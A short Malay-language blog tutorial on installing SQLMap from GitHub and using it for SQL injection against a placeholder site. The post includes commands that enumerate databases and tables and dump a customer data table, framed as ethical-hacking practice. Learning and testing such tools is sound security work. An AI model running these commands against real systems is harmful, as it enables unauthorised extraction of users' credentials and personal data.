Memasang SQLMap Pada Sistem Operasi Komputer Anda

sqlmap

Salam 1Malaysia dan salam buat semua. Entri pada kali ini berkenaan dengan SQL Injection yang menggunakan SQLmap.

Apa itu SQLMap? Aplikasi ini dijaalankan melalui terimal untuk sistem pengoperasian Linux dan BSD ataupun CMD bagi pengoperasian Windows dan SQLMap boleh digunakan untuk menguji exploits pada sistem SQL Database pada webserver anda malah boleh juga digunakan untuk mengumpul serta mengekstrak data sulit dan maklumat penting seperti nama user dan kata laluan pengguna sekiranya terdapat kelemahan pada sistem pangkalan data dengan menyuntik SQL Injection ke dalamnya. SQLMap dapat mengesan kelemahan data seperti table, columns pada sistem pangkalan data yang telah dikenal pasti bermasalah ataupun tahap sekuriti yang agak kurang diperi perhatian oleh sistem admin serta maklumat tidak sentiasa dikemaskini dengan baik. Selalunya sistem yang menjadi sasaran SQL Injection adalah seperti menggunakan sistem yang telah pun tamat tempoh penggunaan ataupun outdated dari segi patches sekuriti dan updates.

Namun saya bukan lah bercadang untuk mengajar anda melakukan hacking tanpa beretika keatas mana-mana pihak tapi adalah lebih kepada sekadar pengenalan dan seterusnya kepada kaedah pemasangan SQLMap dikomputer anda sekadar untuk menguji kemahiran ethical hacking skills anda.

sudo apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev

Untuk Memaparkan Senarai PILIHAN SQLMap pada terminal klien anda:

python sqlmap.py -h

Mencapai maklumat nama serta URL yang terdapat kelemahan pada pangkalan database. SQLMap boleh dimulakan sekarang dengan perintah:

python sqlmap.py -u www.example.com/home.php?ID=10 --dbs

Untuk senaraikan data tables pada database yang telah dikenal pasti (e.g.: test)

python sqlmap.py -u www.example.com/home.php?ID=10 -D test --tables

Dump semua data didalam pangkalan database (test) and table (e.g.: costumer_data)

python sqlmap.py -u www.example.com/home.php?ID=10 -D test -T costumer_data --dump

Sila ikuti langkah pada : https://gist.github.com/stamparm/5335217 Untuk mendapatkan maklumat yang lebih lanjut.

Facebook Comments

About alderson

AKA Pseudo

,

Comments are closed.
Asia/Jerusalem : 11:40:36America/New_York : 04:40:36Asia/Tokyo : 17:40:36Asia/Kuala_Lumpur : 16:40:36